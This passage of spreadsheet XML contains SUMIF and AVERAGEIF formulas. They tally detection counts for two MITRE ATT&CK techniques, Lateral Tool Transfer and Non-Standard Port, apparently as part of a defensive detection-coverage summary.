        <f t="shared" si="13"/>
        <v>61</v>
      </c>
      <c r="B63" s="4" t="str">
        <f>IFERROR(VLOOKUP(A63,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1570</v>
      </c>
      <c r="C63" s="493" t="str">
        <f>IFERROR(VLOOKUP(B63,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Lateral Tool Transfer</v>
      </c>
      <c r="D63" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B63)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E63" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>7</v>
      </c>
      <c r="F63" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (7)</v>
      </c>
      <c r="G63" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>7</v>
      </c>
      <c r="H63" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>2</v>
      </c>
      <c r="I63" s="322" t="str">
        <f t="shared" si="0"/>
        <v>2 (7)</v>
      </c>
      <c r="J63" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>1</v>
      </c>
      <c r="K63" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L63" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>2</v>
      </c>
      <c r="M63" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>3</v>
      </c>
      <c r="N63" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>2</v>
      </c>
      <c r="O63" s="322" t="str">
        <f t="shared" si="1"/>
        <v>2 (3)</v>
      </c>
      <c r="P63" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>1</v>
      </c>
      <c r="Q63" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R63" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>2</v>
      </c>
      <c r="S63" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>10</v>
      </c>
      <c r="T63" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>4</v>
      </c>
      <c r="U63" s="4" t="str">
        <f t="shared" si="2"/>
        <v>4 (10)</v>
      </c>
      <c r="V63" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>2</v>
      </c>
      <c r="W63" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X63" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>2</v>
      </c>
      <c r="Y63" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>7</v>
      </c>
      <c r="Z63" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>2</v>
      </c>
      <c r="AA63" s="322" t="str">
        <f t="shared" si="3"/>
        <v>2 (7)</v>
      </c>
      <c r="AB63" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>2</v>
      </c>
      <c r="AC63" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD63" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>2</v>
      </c>
      <c r="AE63" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>32</v>
      </c>
      <c r="AF63" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>21</v>
      </c>
      <c r="AG63" s="322" t="str">
        <f t="shared" si="4"/>
        <v>21 (32)</v>
      </c>
      <c r="AH63" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>18</v>
      </c>
      <c r="AI63" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ63" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>2</v>
      </c>
      <c r="AK63" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>39</v>
      </c>
      <c r="AL63" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>23</v>
      </c>
      <c r="AM63" s="322" t="str">
        <f t="shared" si="5"/>
        <v>23 (39)</v>
      </c>
      <c r="AN63" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>19</v>
      </c>
      <c r="AO63" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP63" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>2</v>
      </c>
      <c r="AQ63" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR63" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS63" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT63" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU63" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV63" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW63" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
      <c r="AX63" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY63" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ63" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA63" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB63" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC63" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>10</v>
      </c>
      <c r="BD63" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>4</v>
      </c>
      <c r="BE63" s="4" t="str">
        <f t="shared" si="8"/>
        <v>4 (10)</v>
      </c>
      <c r="BF63" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>2</v>
      </c>
      <c r="BG63" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH63" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>2</v>
      </c>
      <c r="BI63" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>2</v>
      </c>
      <c r="BJ63" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>1</v>
      </c>
      <c r="BK63" s="322" t="str">
        <f t="shared" si="9"/>
        <v>1 (2)</v>
      </c>
      <c r="BL63" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>1</v>
      </c>
      <c r="BM63" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN63" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>1</v>
      </c>
      <c r="BO63" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>2</v>
      </c>
      <c r="BP63" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>1</v>
      </c>
      <c r="BQ63" s="4" t="str">
        <f t="shared" si="10"/>
        <v>1 (2)</v>
      </c>
      <c r="BR63" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>1</v>
      </c>
      <c r="BS63" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>0</v>
      </c>
      <c r="BT63" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU63" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B63,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>1</v>
      </c>
      <c r="BV63" s="292">
        <v>0</v>
      </c>
      <c r="BW63" s="322">
        <v>0</v>
      </c>
      <c r="BX63" s="4" t="str">
        <f t="shared" si="11"/>
        <v>0 (0)</v>
      </c>
      <c r="BY63" s="12">
        <v>0</v>
      </c>
      <c r="BZ63" s="13">
        <v>0</v>
      </c>
      <c r="CA63" s="394">
        <v>0</v>
      </c>
      <c r="CB63" s="288">
        <v>0</v>
      </c>
      <c r="CC63" s="4">
        <v>0</v>
      </c>
      <c r="CD63" s="4" t="str">
        <f t="shared" si="12"/>
        <v>0 (0)</v>
      </c>
      <c r="CE63" s="4">
        <v>0</v>
      </c>
      <c r="CF63" s="4">
        <v>0</v>
      </c>
      <c r="CG63" s="13">
        <v>0</v>
      </c>
      <c r="CH63" s="394">
        <v>0</v>
      </c>
    </row>
    <row r="64" spans="1:86" ht="15" customHeight="1">
      <c r="A64" s="4">
        <f t="shared" si="13"/>
        <v>62</v>
      </c>
      <c r="B64" s="4" t="str">
        <f>IFERROR(VLOOKUP(A64,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1571</v>
      </c>
      <c r="C64" s="4" t="str">
        <f>IFERROR(VLOOKUP(B64,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Non-Standard Port</v>
      </c>
      <c r="D64" s="4">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B64)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E64" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>1</v>
      </c>
      <c r="F64" s="286" t="str">
        <f t="shared" si="14"/>
        <v>1 (1)</v>
      </c>
      <c r="G64" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>2</v>
      </c>
      <c r="H64" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>1</v>
      </c>
      <c r="I64" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (2)</v>
      </c>
      <c r="J64" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>1</v>
      </c>
      <c r="K64" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L64" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>1</v>
      </c>
      <c r="M64" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N64" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O64" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P64" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q64" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R64" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S64" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>2</v>
      </c>
      <c r="T64" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>1</v>
      </c>
      <c r="U64" s="4" t="str">
        <f t="shared" si="2"/>
        <v>1 (2)</v>
      </c>
      <c r="V64" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>1</v>
      </c>
      <c r="W64" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X64" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>1</v>
      </c>
      <c r="Y64" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>3</v>
      </c>
      <c r="Z64" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>2</v>
      </c>
      <c r="AA64" s="322" t="str">
        <f t="shared" si="3"/>
        <v>2 (3)</v>
      </c>
      <c r="AB64" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>1</v>
      </c>
      <c r="AC64" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD64" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>1</v>
      </c>
      <c r="AE64" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>4</v>
      </c>
      <c r="AF64" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>2</v>
      </c>
      <c r="AG64" s="322" t="str">
        <f t="shared" si="4"/>
        <v>2 (4)</v>
      </c>
      <c r="AH64" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>2</v>
      </c>
      <c r="AI64" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ64" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>1</v>
      </c>
      <c r="AK64" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>7</v>
      </c>
      <c r="AL64" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>4</v>
      </c>
      <c r="AM64" s="322" t="str">
        <f t="shared" si="5"/>
        <v>4 (7)</v>
      </c>
      <c r="AN64" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>4</v>
      </c>
      <c r="AO64" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP64" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>1</v>
      </c>
      <c r="AQ64" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR64" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS64" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT64" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU64" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV64" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW64" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
      <c r="AX64" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY64" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ64" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA64" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB64" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC64" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>2</v>
      </c>
      <c r="BD64" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>1</v>
      </c>
      <c r="BE64" s="4" t="str">
        <f t="shared" si="8"/>
        <v>1 (2)</v>
      </c>
      <c r="BF64" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>1</v>
      </c>
      <c r="BG64" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH64" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>1</v>
      </c>
      <c r="BI64" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>0</v>
      </c>
      <c r="BJ64" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>0</v>
      </c>
      <c r="BK64" s="322" t="str">
        <f t="shared" si="9"/>
        <v>0 (0)</v>
      </c>
      <c r="BL64" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>0</v>
      </c>
      <c r="BM64" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>0</v>
      </c>
      <c r="BN64" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>0</v>
      </c>
      <c r="BO64" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>2</v>
      </c>
      <c r="BP64" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>2</v>
      </c>
      <c r="BQ64" s="4" t="str">
        <f t="shared" si="10"/>
        <v>2 (2)</v>
      </c>
      <c r="BR64" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>0</v>
      </c>
      <c r="BS64" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>2</v>
      </c>
      <c r="BT64" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU64" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B64,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>1</v>
      </c>
      <c r="BV64" s="292">
        <v>1</v>
      </c>
      <c r="BW64" s="322">
        <v>1</v>
      </c>
      <c r="BX64" s="4" t="str">
        <f t="shared" si="11"/>
